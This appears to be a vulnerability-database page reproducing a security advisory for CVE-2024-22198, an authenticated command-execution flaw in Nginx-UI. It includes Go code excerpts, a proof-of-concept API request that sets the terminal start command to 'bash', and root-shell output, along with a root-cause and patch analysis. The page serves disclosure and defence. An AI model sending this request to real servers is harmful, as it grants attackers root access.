7.1

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-22198

GHSA ID

GHSA-8r25-68wm-jw35

EPSS Score

0.96022%

CWE

CWE-77

Published

1/11/2024

Updated

1/11/2024

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-22198

CVE-2024-22198: Authenticated (user role) arbitrary command execution by modifying `start_cmd` setting (GHSL-2023-268)

Summary

Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings.

Details

The Home > Preference page exposes a list of system settings such as Run Mode, Jwt Secret, Node Secret and Terminal Start Command. The latter is used to specify the command to be executed when a user opens a terminal from the web interface. While the UI doesn't allow users to modify the Terminal Start Command setting, it is possible to do so by sending a request to the API.

func InitPrivateRouter(r *gin.RouterGroup) {
    r.GET("settings", GetSettings)
    r.POST("settings", SaveSettings)
    ...
}

The SaveSettings function is used to save the settings. It is protected by the authRequired middleware, which requires a valid JWT token or a X-Node-Secret which must equal the Node Secret configuration value. However, given the lack of authorization roles, any authenticated user can modify the settings.

The SaveSettings function is defined as follows:

func SaveSettings(c *gin.Context) {
    var json struct {
        Server settings.Server `json:"server"`
        ...
    }

    ...

    settings.ServerSettings = json.Server

    ...

    err := settings.Save()
    ...
}

The Terminal Start Command setting is stored as settings.ServerSettings.StartCmd. By spawning a terminal with Pty, the StartCmd setting is used:

func Pty(c *gin.Context) {
	...

	p, err := pty.NewPipeLine(ws)

	...
}

The NewPipeLine function is defined as follows:

func NewPipeLine(conn *websocket.Conn) (p *Pipeline, err error) {
	c := exec.Command(settings.ServerSettings.StartCmd)

    ...

This issue was found using CodeQL for Go: Command built from user-controlled sources.

Proof of Concept

Based on this setup using uozi/nginx-ui:v2.0.0-beta.7.

Login as a newly created user.
Send the following request to modify the settings with "start_cmd":"bash" :

POST /api/settings HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 512
Authorization: <<JWT TOKEN>>
Content-Type: application/json

{"nginx":{"access_log_path":"","error_log_path":"","config_dir":"","pid_path":"","test_config_cmd":"","reload_cmd":"","restart_cmd":""},"openai":{"base_url":"","token":"","proxy":"","model":""},"server":{"http_host":"0.0.0.0","http_port":"9000","run_mode":"debug","jwt_secret":"...","node_secret":"...","http_challenge_port":"9180","email":"...","database":"foo","start_cmd":"bash","ca_dir":"","demo":false,"page_size":10,"github_proxy":""}}

Open a terminal from the web interface and execute arbitrary commands as root:

root@1de46642d108:/app# id
uid=0(root) gid=0(root) groups=0(root)

Impact

This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure.

(GitHub Advisory)

7.1

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-22198

GHSA ID

GHSA-8r25-68wm-jw35

EPSS Score

0.96022%

CWE

CWE-77

Published

1/11/2024

Updated

1/11/2024

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/0xJacky/Nginx-UI	go	< 2.0.0.beta.9	2.0.0.beta.9

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability chain requires two key functions:

SaveSettings (api/system/settings.go) was vulnerable because it allowed any authenticated user to overwrite protected settings like start_cmd due to missing field-level authorization checks. The pre-patch code directly assigned json.Server to settings.ServerSettings.
NewPipeLine (internal/pty/pipeline.go) was vulnerable as it executed the user-controlled StartCmd value via exec.Command. The combination of these functions enabled command injection. The patch added protected field filtering in SaveSettings and hardened the settings structure to prevent overwrites.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry N*inx-UI is * w** int*r**** to m*n*** N*inx *on*i*ur*tions. It is vuln*r**l* to *r*itr*ry *omm*n* *x**ution *y **usin* t** *on*i*ur*tion s*ttin*s. ### **t*ils T** `*om* > Pr***r*n**` p*** *xpos*s * list o* syst*m s*ttin*s su** *s `Run Mo

Reasoning

T** vuln*r**ility ***in r*quir*s two k*y *un*tions: *. S*v*S*ttin*s (*pi/syst*m/s*ttin*s.*o) w*s vuln*r**l* ****us* it *llow** *ny *ut**nti**t** us*r to ov*rwrit* prot**t** s*ttin*s lik* st*rt_*m* *u* to missin* *i*l*-l*v*l *ut*oriz*tion ****ks. T**

7.1

Basic Information

Concerned about an active attack path?

CVE-2024-22198: Authenticated (user role) arbitrary command execution by modifying `start_cmd` setting (GHSL-2023-268)

Summary

Details

Proof of Concept

Impact

7.1

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI